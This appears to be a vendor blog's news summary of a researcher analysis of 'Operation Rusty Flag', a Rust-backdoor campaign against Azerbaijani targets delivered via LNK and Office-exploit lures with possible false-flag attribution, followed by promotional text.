A new cyberattack targeting Azerbaijani victims has been identified. The attack is known as Operation Rusty Flag and cybersecurity firm Deep Instinct is tracking it.
A new cyberattack targeting Azerbaijani victims has been identified. The attack is known as Operation Rusty Flag and cybersecurity firm Deep Instinct is tracking it. The campaign has not been connected to any known threat actors or groups at this time.
An analysis published last week by security researchers Simon Kenin, Ron Ben Yizhak, and Mark Vaitzman indicated that the operation had at least two initial access vectors. Among the lures used were modified documents used by Storm-0978. This could have been a deliberate false flag.
An LNK file is used as a launchpad for retrieving a second-stage payload from Dropbox. This payload is an MSI installer that drops an implant written in Rust on the compromised system. The installer also creates an XML file for the execution of the implant and a decoy image file with a watermark representing the Azerbaijan Ministry of Defense.
One alternative infection vector is a Microsoft Office document named "Overview_of_UWCs_UkraineInNATO_campaign.docx," which exploits CVE-2017-11882, a memory corruption vulnerability in Microsoft Office's Equation Editor, to trigger a Dropbox URL containing a different MSI file containing a variant of the Rust backdoor.
It is noteworthy that Overview_of_UWCs_UkraineInNATO_campaign.docx was used in recent cyber attacks targeting Ukraine that exploited a remote code execution flaw (CVE-2023-36884) exploited by Storm-0978 (aka RomCom, Tropical Scorpius, UNC2596, and Void Rabisu).
The researchers concluded that this action appears to be a deliberate false flag attempt to attribute the attack to Storm-0978.
One of the Rust backdoors, WinDefenderHealth.exe, has the capability of gathering and sending information from the compromised host to an attacker-controlled server.
Although the precise objectives of this campaign are not known, there is the possibility that it could serve as a red team exercise. The researchers also note that Rust-based malware is becoming increasingly popular among malware authors as the reverse engineering process is more complex, and many security products do not accurately detect it.
Want your digital assets to be protected?
CyberShelter provides innovative and modern cybersecurity products and niche services to individuals and organization against all kinds of cyber threats.
For the latest cyber threats and the latest hacking news please follow us on Facebook, Linkedin, and Twitter.
You may be interested in reading: How to Survive the COVID Time Cyber Security Threats?